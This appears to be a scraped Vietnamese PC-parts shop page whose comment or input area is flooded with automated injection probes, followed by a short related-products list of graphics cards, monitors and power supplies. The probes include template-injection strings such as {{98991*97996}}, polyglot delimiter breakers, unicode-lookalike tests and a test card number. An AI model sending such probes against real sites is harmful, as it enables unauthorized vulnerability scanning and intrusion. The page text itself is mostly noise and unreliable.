 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
 ZSXWKrHh
 
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 acx__${98991*97996}__::.x
4111111111111111
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acu4270<s1﹥s2ʺs3ʹuca4270
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 ZSXWKrHh
acu10298<s1﹥s2ʺs3ʹuca10298
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh
acux4812
 ZSXWKrHh
acx{{98991*97996}}xca
 ZSXWKrHh
acux6621
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 acx__${98991*97996}__::.x
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 ZSXWKrHh
 ZSXWKrHh
acx[[${98991*97996}]]xca
 ZSXWKrHh[removed]gXm5(9529)[removed]
4111111111111111
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 ZSXWKrHh
acx[[${98991*97996}]]xca
 ZSXWKrHh
acx__${98991*97996}__::.x
 ZSXWKrHhOAYM5[!+!]
4111111111111111
 ZSXWKrHh[removed]6UZe(9818)[removed]
4111111111111111
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh
 ZSXWKrHhIRBNF[!+!]
4111111111111111
 ZSXWKrHh
acx__${98991*97996}__::.x
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 ZSXWKrHh
acx{{98991*97996}}xca
 acx__${98991*97996}__::.x
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 ZSXWKrHh
4111111111111111[removed]IXUa(9562)[removed]
 ZSXWKrHh
acx[[${98991*97996}]]xca
 ZSXWKrHh
acx[[${98991*97996}]]xca
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh
acx__${98991*97996}__::.x
 ZSXWKrHh
4111111111111111[removed]kI4H(9408)[removed]
 ZSXWKrHh
4111111111111111CTAHK[!+!]
 ZSXWKrHh[removed]mpGq(9603)[removed]
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 ZSXWKrHh
acx__${98991*97996}__::.x
 ZSXWKrHh
41111111111111111MLLE[!+!]
 ZSXWKrHhSB4OB[!+!]
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 ZSXWKrHh
4111111111111111[removed]MFEs(9281)[removed]
 ZSXWKrHh
4111111111111111[removed]fztI(9476)[removed]
 ZSXWKrHh
4111111111111111WUZMN[!+!]
 ZSXWKrHh
4111111111111111GVPWS[!+!]
Vui lòng nhập nội dung

Sản phẩm liên quan

VGA MSI R9 270X 4GB Gaming
VGA MSI R9 270X 4GB Gaming
₫2,500,000 ₫Liên hệ
100%giảm
LCD 27 AOC i2769V
LCD 27 AOC i2769V
₫2,800,000 ₫Liên hệ
100%giảm
LCD ASUS Model VS247
LCD ASUS Model VS247
₫2,100,000 ₫Liên hệ
100%giảm
Antec 500W( VP500PC)
Antec 500W( VP500PC)
₫650,000 ₫Liên hệ
100%giảm
Cooler Master 460W
Cooler Master 460W
₫420,000 ₫Liên hệ
100%giảm
VGA R7 370 Gigabyte( BH 2019
VGA R7 370 Gigabyte( BH 2019
₫2,300,000 ₫Liên hệ
100%giảm